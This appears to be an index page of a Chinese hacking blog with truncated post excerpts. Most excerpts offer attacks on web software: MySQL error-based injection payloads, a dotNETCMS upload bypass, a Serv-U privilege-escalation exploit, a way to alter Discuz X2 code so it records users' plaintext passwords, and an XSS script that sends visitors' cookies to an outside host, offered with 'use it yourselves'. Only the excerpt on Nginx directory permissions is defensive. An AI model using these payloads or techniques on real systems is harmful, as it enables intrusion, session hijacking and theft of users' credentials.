深掘XSS漏洞场景之XSS Rootkit[完整修订版]

0x00 前言 众所周知xss漏洞的风险定义一直比较模糊,XSS漏洞属于高危漏洞还是低风险漏洞一直以来都有所争议。XSS漏洞类型主要分为两种持久型和非持久型: 1. 非持久型XSS漏洞一般存在于URL参数中,需要访问黑客构造好的特定URL才能触发漏洞。 2. 持久型XSS漏洞一般存在于富文本等交互功能,如发帖留言等,黑客可以用XSS内容经正常功能进入数据库持久保存。 3. DOM XSS漏洞,也分...

- 阅读全文 -

风讯dotNETCMS 0day

漏洞出在用户页面,注册个用户。文章管理,上传。。选择文件名不变.... 上传1.asp;,jpg 然后你们懂的

- 阅读全文 -

shopex 4.8.5密码取回处新生成密码可预测漏洞

最近一年来很少写blog,主要原因是三个,一是一直以来在blog里说的,稍微带点技术的东西,因为可能未来在公司里用得上,所以不方便在blog上讲;二是最近转战微博了,也算是顺应潮流;三是最近一年多来,博文视点约我写了一本书,仅有的那么一点时间也要投入到写书大计中,实在没什么时间再写博客这种奢侈的东西。好在这本关于Web Security的书终于是快要写完了,在最近应该能够交稿,一共写了18章,第一...

- 阅读全文 -

MYSQL高级报错注入

and (select count(*) from mysql.user)>0/*   1、查看MYSQL版本 and+exists(select*from+(select*from(select+name_const(@@version,0))a+join(select+name_const(@@version,0))b)c)   2、爆所有库 and(select 1...

- 阅读全文 -

hzhost6.5 华众虚拟主机管理系统最新SQL漏洞

这次漏洞出在channeldmectr.asp这个文件上,跟本就没有过滤任何参数.   正好我这里有正版的补丁,打开看下了,打上补丁的channeldmectr.asp文件在第21行到第40行,增加了以下代码:       程序代码Function SafeRequest(ParaName)   Dim ParaValue   ParaValue=Request(ParaName)   if Is...

- 阅读全文 -

shell下轻松截获DZ X2明文密码

首先:第一次发帖,大牛请一笑而过 其次:这是通过简单修改DZ源文件,利用密码错误记录原理截取明文密码 呵呵,目的比较简单,不想跑那蛋疼的二次加密MD5,当然不是为了做坏事 目标文件:/source/class/class_member.php   先看错误密码记录部分,第200行左右    } else {  $password = preg_replace("/^(.{".r...

- 阅读全文 -

serv-u最新通杀所有版本0day包括11.x

serv-u最新通杀所有版本提权代码。10.x的也可以提,昨天俺成功11版本的, 不要直接添加系统帐号或者执行命令,用添加的FTP帐号在CMD下面连接提权。 要不容易出错的。 EXP: <style type="text/css"> <!-- body,td,th { font-size: 12px; } --> </style> <% Function ...

- 阅读全文 -

关于Nginx+PHP的虚拟主机目录权限控制的探究

Nginx的使用者最近越来越多,很多大型网站也都从Apache或其他平台迁移到了Nginx。但在我使用Nginx的过程中有个问题一直未得到解决,就是如何限制Nginx+PHP的目录权限 我们知道,在Apache中可以很容易的对虚拟目录进行权限控制,如: <VirtualHost www.xpb.cn> ServerAdmin xiaopb@live.com DocumentRoot /...

- 阅读全文 -

星外订单提交处过滤不严导致XSS

google or baidu 搜索 inurl:user/order.asp?type=虚拟主机 暂时只会XSS偷取cookie 可以加帐号 可以后台挂马 等等等等 自己利用吧。 XXS 偷取cookie代码 <script>document.write('<img src="https://www.webshell.cc/news.asp?msg='+document.cook...

- 阅读全文 -